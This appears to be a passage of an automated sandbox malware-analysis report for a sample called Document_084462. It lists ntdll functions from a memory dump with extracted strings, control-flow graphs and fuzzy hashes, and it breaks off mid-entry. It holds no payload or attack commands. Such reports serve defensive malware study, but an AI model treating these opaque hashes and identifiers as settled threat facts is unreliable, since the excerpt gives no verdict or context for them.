                                                                              • LanguageConfiguration, xrefs: 37B55FA0
                                                                              • @, xrefs: 37B55DF7
                                                                              • @, xrefs: 37B55FFA
                                                                              • PreferredUILanguages, xrefs: 37B55F51
                                                                              • @, xrefs: 37B55F20
                                                                              • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 37B55604
                                                                              • Control Panel\Desktop, xrefs: 37B55CDE
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 37B55EDD
                                                                              • @, xrefs: 37B55D30
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 37B55B61
                                                                              • LanguageConfigurationPending, xrefs: 37B55DA1
                                                                              • InstallLanguageFallback, xrefs: 37B55BD0
                                                                              • @, xrefs: 37B55BA7
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                                              • API String ID: 0-1325123933
                                                                              • Opcode ID: 595121532202b6bb855a691521781a7012baf7189c90fb246584be6cb263013d
                                                                              • Instruction ID: 4656019c93e66c6602031f5bfb19f47d6f59e578f627a1da5ebc1028c3bd30e2
                                                                              • Opcode Fuzzy Hash: 595121532202b6bb855a691521781a7012baf7189c90fb246584be6cb263013d
                                                                              • Instruction Fuzzy Hash: 5F7258B55083519FE350CF24C880BABB7FAEF88764F44492DF99997250EB35E805CB92
                                                                              Function 37B5FDF4 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1212 37b5fdf4-37b5fe16 call 37b07be4 1215 37b5fe35-37b5fe4d call 37aa7662 1212->1215 1216 37b5fe18-37b5fe30 RtlDebugPrintTimes 1212->1216 1220 37b60277 1215->1220 1221 37b5fe53-37b5fe69 1215->1221 1222 37b602d1-37b602e0 1216->1222 1225 37b6027a-37b602ce call 37b602e6 1220->1225 1223 37b5fe70-37b5fe72 1221->1223 1224 37b5fe6b-37b5fe6e 1221->1224 1226 37b5fe73-37b5fe8a 1223->1226 1224->1226 1225->1222 1228 37b5fe90-37b5fe93 1226->1228 1229 37b60231-37b6023a GetPEB 1226->1229 1228->1229 1231 37b5fe99-37b5fea2 1228->1231 1233 37b6023c-37b60257 GetPEB call 37aab910 1229->1233 1234 37b60259-37b6025e call 37aab910 1229->1234 1237 37b5fea4-37b5febb call 37abfed0 1231->1237 1238 37b5febe-37b5fed1 call 37b60835 1231->1238 1240 37b60263-37b60274 call 37aab910 1233->1240 1234->1240 1237->1238 1247 37b5fed3-37b5feda 1238->1247 1248 37b5fedc-37b5fef0 call 37aa753f 1238->1248 1240->1220 1247->1248 1251 37b5fef6-37b5ff02 GetPEB 1248->1251 1252 37b60122-37b60127 1248->1252 1253 37b5ff04-37b5ff07 1251->1253 1254 37b5ff70-37b5ff7b 1251->1254 1252->1225 1255 37b6012d-37b60139 GetPEB 1252->1255 1256 37b5ff26-37b5ff2b call 37aab910 1253->1256 1257 37b5ff09-37b5ff24 GetPEB call 37aab910 1253->1257 1260 37b5ff81-37b5ff88 1254->1260 1261 37b60068-37b6007a call 37ac2710 1254->1261 1258 37b601a7-37b601b2 1255->1258 1259 37b6013b-37b6013e 1255->1259 1272 37b5ff30-37b5ff51 call 37aab910 GetPEB 1256->1272 1257->1272 1258->1225 1262 37b601b8-37b601c3 1258->1262 1264 37b60140-37b6015b GetPEB call 37aab910 1259->1264 1265 37b6015d-37b60162 call 37aab910 1259->1265 1260->1261 1268 37b5ff8e-37b5ff97 1260->1268 1284 37b60110-37b6011d call 37b60d24 call 37b60835 1261->1284 1285 37b60080-37b60087 1261->1285 1262->1225 1269 37b601c9-37b601d4 1262->1269 1283 37b60167-37b6017b call 37aab910 1264->1283 1265->1283 1275 37b5ff99-37b5ffa9 1268->1275 1276 37b5ffb8-37b5ffbc 1268->1276 1269->1225 1278 37b601da-37b601e3 GetPEB 1269->1278 1272->1261 1305 37b5ff57-37b5ff6b 1272->1305 1275->1276 1277 37b5ffab-37b5ffb5 call 37b6d646 1275->1277 1279 37b5ffce-37b5ffd4 1276->1279 1280 37b5ffbe-37b5ffcc call 37ae3ae9 1276->1280 1277->1276 1288 37b601e5-37b60200 GetPEB call 37aab910 1278->1288 1289 37b60202-37b60207 call 37aab910 1278->1289 1291 37b5ffd7-37b5ffe0 1279->1291 1280->1291 1315 37b6017e-37b60188 GetPEB 1283->1315 1284->1252 1294 37b60092-37b6009a 1285->1294 1295 37b60089-37b60090 1285->1295 1312 37b6020c-37b6022c call 37b5823a call 37aab910 1288->1312 1289->1312 1303 37b5fff2-37b5fff5 1291->1303 1304 37b5ffe2-37b5fff0 1291->1304 1296 37b6009c-37b600ac 1294->1296 1297 37b600b8-37b600bc 1294->1297 1295->1294 1296->1297 1307 37b600ae-37b600b3 call 37b6d646 1296->1307 1309 37b600be-37b600d1 call 37ae3ae9 1297->1309 1310 37b600ec-37b600f2 1297->1310 1313 37b5fff7-37b5fffe 1303->1313 1314 37b60065 1303->1314 1304->1303 1305->1261 1307->1297 1326 37b600e3 1309->1326 1327 37b600d3-37b600e1 call 37adfdb9 1309->1327 1320 37b600f5-37b600fc 1310->1320 1312->1315 1313->1314 1319 37b60000-37b6000b 1313->1319 1314->1261 1315->1225 1321 37b6018e-37b601a2 1315->1321 1319->1314 1324 37b6000d-37b60016 GetPEB 1319->1324 1320->1284 1325 37b600fe-37b6010e 1320->1325 1321->1225 1329 37b60035-37b6003a call 37aab910 1324->1329 1330 37b60018-37b60033 GetPEB call 37aab910 1324->1330 1325->1284 1333 37b600e6-37b600ea 1326->1333 1327->1333 1337 37b6003f-37b6005d call 37b5823a call 37aab910 1329->1337 1330->1337 1333->1320 1337->1314
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                              • API String ID: 3446177414-1700792311
                                                                              • Opcode ID: e8a934ae56859daa8a011947cac8e337f110b5e1a19a6fbe0dc358cf1b5aada2
                                                                              • Instruction ID: e2ef55d5efc29d1b2821862a50556d0a0b4003b0726c73f1a8dfa6a7ba9686e6
                                                                              • Opcode Fuzzy Hash: e8a934ae56859daa8a011947cac8e337f110b5e1a19a6fbe0dc358cf1b5aada2
                                                                              • Instruction Fuzzy Hash: 12D13279501289EFEB41DFA9C405EAEFBF2FF09324F048059E954AB222D739A941CF11
                                                                              Function 37B5F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                              • API String ID: 3446177414-1745908468
                                                                              • Opcode ID: 7086e5af9c0c8b7ba603fed847328b20ea479f4ceb5fd1391562025eaedd24fa
                                                                              • Instruction ID: ec492aee352707b31459ed20166811e1677a4be31c613023e81597a9707611e0
                                                                              • Opcode Fuzzy Hash: 7086e5af9c0c8b7ba603fed847328b20ea479f4ceb5fd1391562025eaedd24fa
                                                                              • Instruction Fuzzy Hash: 929102B9901685DFFB41CFA8C440AADFBF2FF49360F148059E851AB251DB3AA941CF11
                                                                              Function 37AAD2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                              • API String ID: 0-3532704233
                                                                              • Opcode ID: 2dea0771299b5b068784c6daf9e35ad309460cf19e872eb59ade776357b7e1ef
                                                                              • Instruction ID: 5437e8e9bfb19569000165661f7e7d6af3af7e83faa2c903a3b8ec7b046d4bb3
                                                                              • Opcode Fuzzy Hash: 2dea0771299b5b068784c6daf9e35ad309460cf19e872eb59ade776357b7e1ef
                                                                              • Instruction Fuzzy Hash: 2BB17CB59083529FD751CF24C980B5FBBE8AB88754F41492EFCA4E7244EB34D9488B93
                                                                              Function 37ADD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlDebugPrintTimes.NTDLL ref: 37ADD879
                                                                                • Part of subcall function 37AB4779: RtlDebugPrintTimes.NTDLL ref: 37AB4817
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                              • API String ID: 3446177414-1975516107
                                                                              • Opcode ID: fd52ca0fd79c7d3eb7f09e9e654ff1108ab39888c4f1f815c96acc958f400489
                                                                              • Instruction ID: 2f0f24fb7af79b8e91b0da4374f1fddc8bf4d02cd5f06ac087453e8674e1e773
                                                                              • Opcode Fuzzy Hash: fd52ca0fd79c7d3eb7f09e9e654ff1108ab39888c4f1f815c96acc958f400489
                                                                              • Instruction Fuzzy Hash: 80510FB5A44346DFEB44DFA4C596B9DBBB1BF44314F20409ADC20BB281D738A986CF81
                                                                              Function 37AAD02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 37AAD263
                                                                              • @, xrefs: 37AAD09D
                                                                              • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 37AAD06F
                                                                              • @, xrefs: 37AAD2B3
                                                                              • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 37AAD0E6
                                                                              • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 37AAD202
                                                                              • @, xrefs: 37AAD24F
                                                                              • Control Panel\Desktop\LanguageConfiguration, xrefs: 37AAD136
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                              • API String ID: 0-1356375266
                                                                              • Opcode ID: d4d400d40b96f3b3d8dad89602e282a588afd778894d23e339f6f7afdce07592
                                                                              • Instruction ID: bbb382fa46a6798211352bf4338028ca9d157d6d705457fc67a6fb02528ed354
                                                                              • Opcode Fuzzy Hash: d4d400d40b96f3b3d8dad89602e282a588afd778894d23e339f6f7afdce07592
                                                                              • Instruction Fuzzy Hash: A0A11FB15083459FE751CF20C980B5BBBE8BB84765F40492EF9A8A7240E779D908CF93
                                                                              Function 37B5F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                              • API String ID: 0-2224505338
                                                                              • Opcode ID: 1f6b928690ab6488826c024bb744365691d320f494fb44a651c33418f4675f32
                                                                              • Instruction ID: 737d09c0a0c68e9f333860e1d759c6deea509654cc1f5fa9249319c8bdd70807
                                                                              • Opcode Fuzzy Hash: 1f6b928690ab6488826c024bb744365691d320f494fb44a651c33418f4675f32
                                                                              • Instruction Fuzzy Hash: 2C51D07A151284EFE781CBA4D984F5AF7F8EB04674F108499FC11DB261DA39EA50CF12
                                                                              Function 37AAF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-523794902
                                                                              • Opcode ID: b5f4b4d23fb2389ee703d0d3429edac2bbd1f9978f8027fc4bbd2799273916e9
                                                                              • Instruction ID: 6a1e1fb50aa3705ebaee401466fd930347e565712facc2c23ed3d47b4f5a6846
                                                                              • Opcode Fuzzy Hash: b5f4b4d23fb2389ee703d0d3429edac2bbd1f9978f8027fc4bbd2799273916e9
                                                                              • Instruction Fuzzy Hash: 2D42EF75208341DFE349CF24C984B2ABBF5FF88294F044969E8A5DB291DB38E945CF52
                                                                              Function 37ACB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                              • API String ID: 0-122214566
                                                                              • Opcode ID: 9f53a7cccf5a26332cb19a990440cd9e17324b7e8beb2f5b85367f3d0b61eb35
                                                                              • Instruction ID: de83f325d1f0784ac60b4ef0cd0771902b45fd8e2f848a87338e599e5e77b9ad
                                                                              • Opcode Fuzzy Hash: 9f53a7cccf5a26332cb19a990440cd9e17324b7e8beb2f5b85367f3d0b61eb35
                                                                              • Instruction Fuzzy Hash: 41C134B5A40356BAEB05CB64CC81B7EB7F5EF45320F5440A9EC21EB290EB799C44CB91
                                                                              Function 37AC0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                              • API String ID: 0-4253913091
                                                                              • Opcode ID: 20080810ba2fbd93f43e0ebd3d6f59e86464638f417b1e92bc0af93084ef5ebc
                                                                              • Instruction ID: b91df51a6c22e5ea13b1f18b6cd05643c816c419fb67341c2b93426951dfa063
                                                                              • Opcode Fuzzy Hash: 20080810ba2fbd93f43e0ebd3d6f59e86464638f417b1e92bc0af93084ef5ebc
                                                                              • Instruction Fuzzy Hash: 2CF17CB4A0060AEFEB05CF68C994B6AB7B5FF44354F1081A9E825DB381D734E981DF91
                                                                              Function 37AD9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                              • API String ID: 3446177414-2283098728
                                                                              • Opcode ID: 6cf03554ddbab88b90476871de649dfb0f496d747f647aa662e67c2b3d51d63f
                                                                              • Instruction ID: 1cc63549710bfeffab3098dfd4a5caad6c641ed9979aaf2a86745873cd63a8a9
                                                                              • Opcode Fuzzy Hash: 6cf03554ddbab88b90476871de649dfb0f496d747f647aa662e67c2b3d51d63f
                                                                              • Instruction Fuzzy Hash: 505126B46083019BE714EF38C9A4B2977B5FB84724F14066DEC7597290DB38E805CB93
                                                                              Function 37AD510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • Kernel-MUI-Language-Disallowed, xrefs: 37AD5272
                                                                              • WindowsExcludedProcs, xrefs: 37AD514A
                                                                              • Kernel-MUI-Number-Allowed, xrefs: 37AD5167
                                                                              • Kernel-MUI-Language-Allowed, xrefs: 37AD519B
                                                                              • Kernel-MUI-Language-SKU, xrefs: 37AD534B
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                              • API String ID: 0-258546922
                                                                              • Opcode ID: 4844d8ccf45401092379452941578c6955929bb73c87d9fae6164470e740ac3b
                                                                              • Instruction ID: cd327ca2a8f892464ad06198ce9117df26d7924961737e7e7196b7e697769703
                                                                              • Opcode Fuzzy Hash: 4844d8ccf45401092379452941578c6955929bb73c87d9fae6164470e740ac3b
                                                                              • Instruction Fuzzy Hash: BFF13DB6D10219EFDB15CF98C990ADFBBB8FF48650F54406AE921E7210EB749E01CB91
                                                                              Function 37B8ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: DebugPrintTimes
                                                                              • String ID:
                                                                              • API String ID: 3446177414-0
                                                                              • Opcode ID: fb48f975635ef2850721044c52094637ccb431fd990dcbf524dd370a55d2eced
                                                                              • Instruction ID: ba1539e3dfadb0b86d3ac6d88ef7f50ff466ee56198127dc779ad2c3a104a470
                                                                              • Opcode Fuzzy Hash: fb48f975635ef2850721044c52094637ccb431fd990dcbf524dd370a55d2eced
                                                                              • Instruction Fuzzy Hash: 47F11AB2E00661AFDB18CF68C9D167EFBF6EF88210B55416ED466DB380D634E941CB50
                                                                              Function 37AA7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                              • API String ID: 0-3061284088
                                                                              • Opcode ID: ee5025b972a62184e6aa8482c26432ba52429b4cfa09ca93cb44cca4e9517c8c
                                                                              • Instruction ID: 01befd2699ce06b9d70d07de59757bf76d55ccd15b9868b3ebd2c63dfb09417a
                                                                              • Opcode Fuzzy Hash: ee5025b972a62184e6aa8482c26432ba52429b4cfa09ca93cb44cca4e9517c8c
                                                                              • Instruction Fuzzy Hash: 12014C36065190EEE3859378E949F927FF8EB41731F24449EFC20479A08F6D9848DE52
                                                                              Function 37AAF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                              • API String ID: 0-2586055223
                                                                              • Opcode ID: 895fdc324378465ad775009a806f4a15a50e387fdf1c60be2a24906f406eff0e
                                                                              • Instruction ID: 56fb9ad3be7eebc075145702f87f0bbce915ac387f16672ee4f6c115deac29bc
                                                                              • Opcode Fuzzy Hash: 895fdc324378465ad775009a806f4a15a50e387fdf1c60be2a24906f406eff0e
                                                                              • Instruction Fuzzy Hash: 5161CFB5244780AFE311DB64CD44F6BBBE8EF847A0F040499F9648B291DB38E904CB63
                                                                              Function 37AA90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                              • API String ID: 2994545307-1391187441
                                                                              • Opcode ID: 399ea0567bb8ff9cf4fe0b250e57acb3a47144add9a9e3aee6bcc8903f33cd7c
                                                                              • Instruction ID: d885e3cacdb2629744605a518329a8454809f5482fcd76b624b2ef4071ee7b4d
                                                                              • Opcode Fuzzy Hash: 399ea0567bb8ff9cf4fe0b250e57acb3a47144add9a9e3aee6bcc8903f33cd7c
                                                                              • Instruction Fuzzy Hash: 4331A036900208EFDB81CB54DC88F9ABBB8EB45760F1040A5FC24A72A1DB34E940CF61
                                                                              Function 37B3166E Relevance: 5.1, Strings: 4, Instructions: 85COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.13305438713.0000000037A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 37A80000, based on PE: true
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BA9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000001.00000002.13305438713.0000000037BAD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_37a80000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: .txt$.txt2$BoG_ *90.0&!! Yy>$stxt371
                                                                              • API String ID: 0-1880532218
                                                                              • Opcode ID: 79f595932eff051bfbc6f73fa77d46973d92abc92329236736d6fc7be9ad977b
